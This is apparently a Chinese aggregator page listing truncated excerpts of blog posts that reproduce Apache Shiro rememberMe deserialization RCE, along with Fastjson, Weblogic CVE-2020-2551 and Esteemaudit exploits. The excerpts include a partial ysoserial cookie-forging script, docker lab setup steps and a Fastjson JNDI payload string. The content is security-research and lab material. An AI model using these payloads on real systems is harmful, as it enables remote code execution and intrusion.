Shiro 漏洞复现】的更多相关文章

利用burp dns进行检测,脚本如下: import sys import uuid import base64 import subprocess from Crypto.Cipher import AES import requests # copy to clipboard def encode_rememberme(command): popen = subprocess.Popen(['java', '-jar', 'ysoserial.jar', 'URLDNS', command…
Apache Shiro反序列化漏洞复现 0x01 搭建环境 获取docker镜像 Docker pull medicean/vulapps:s_shiro_1 重启docker system restart docker 启动docker镜像: docker run -d -p 8082:8080 medicean/vulapps:s_shiro_1 访问: http://192.168.1.192:8082/ 环境搭建成功 攻击机:139.199.179.167 受害者:192.168.19…
影响版本 Apache Shiro <= 1.2.4 产生原因 shiro默认使用了CookieRememberMeManager,其处理cookie的流程是:得到rememberMe的cookie值-->Base64解码-->AES解密-->反序列化. 然而AES的密钥是硬编码的,就导致了攻击者可以构造恶意数据造成反序列化的RCE漏洞. payload 构造 前16字节的密钥-->后面加入序列化参数-->AES加密-->base64编码-->发送cooki…
漏洞描述 Apache Shiro是一个Java安全框架,执行身份验证.授权.密码和会话管理.只要rememberMe的AES加密密钥泄露,无论shiro是什么版本都会导致反序列化漏洞. 漏洞原理 Apache Shiro框架提供了记住我(RememberMe)的功能,关闭了浏览器下次再打开时还是能记住你是谁,下次访问时无需再登录即可访问. Shiro对rememberMe的cookie做了加密处理,shiro在CookieRememberMeManaer类中将cookie中rememberMe…
Apache Shiro是一个强大且易用的Java安全框架,执行身份验证.授权.密码和会话管理.使用Shiro的易于理解的API,可以快速.轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序.它编号为550的 issue 中爆出了严重的 Java 反序列化漏洞. 漏洞影响版本:Apache Shiro 1.2.4 Shiro反序列化特征:在返回包的 Set-Cookie 中存在 rememberMe=deleteMe 字段 shiro反序列化复现 环境: 我们的公网VPS:1…
影响范围: Fastjson<=1.2.62 需要开启autotype poc: String text1 = "{\"@type\":\"org.apache.xbean.propertyeditor.JndiConverter\",\"AsText\":\"rmi://127.0.0.1:1099/exploit\"}"; pom: <dependency> <groupId&g…
Shiro反序列化复现 ——————环境准备—————— 目标靶机:10.11.10.108 //docker环境 攻击机ip:无所谓 vpsip:192.168.14.222 //和靶机ip可通 1. 使用shior_tools.jar 直接对目标系统进行检测,检测完毕后会返回可执行操作, 下图为 0:DNS记录证明漏洞存在,1:使用JRMPClient反弹shell java -cp shiro_tool.jar Shiro http://10.11.10.108:8081/login.js…
Weblogic CVE-2020-2551漏洞复现 Weblogic IIOP 反序列化 漏洞原理 https://www.anquanke.com/post/id/199227#h3-7 https://www.cnblogs.com/tr1ple/p/12483235.html 漏洞复现 csdn-Weblogic CVE-2020-2551复现 靶机:windows7系统 IP地址:192.168.43.20 攻击机:windows10系统 IP地址:192.168.43.38 工具 e…
Shiro漏洞集合 Shiro其实就是一组Filter,他会进行验证,鉴权,会话 Management,再把请求转到web过滤器.所以最好先去对Shiro有个整体性的了解. 复现环境:https://github.com/ttestoo/java-sec-study/tree/main/sec-shiro/java-shiro-bypass 全部的基于这个项目改下shiro的版本就好啦 全文是基于已知spring/tomcat的路径转发规则URI处理(漏洞),访问/x/s/==/x/s.有机会再…
没有时间测试呢,朋友们都成功复现,放上网盘地址:https://github.com/x0rz/EQGRP 近日臭名昭著的方程式组织工具包再次被公开,TheShadowBrokers在steemit.com博客上提供了相关消息.以下是其中Esteemaudit漏洞复现过程. 前期准备 IP 系统信息 用途 备注 192.168.146.132 Windows xp 攻击机 需安python2.6.6&pywin32 192.168.146.129 kali 2.0 用于生成攻击payload(反…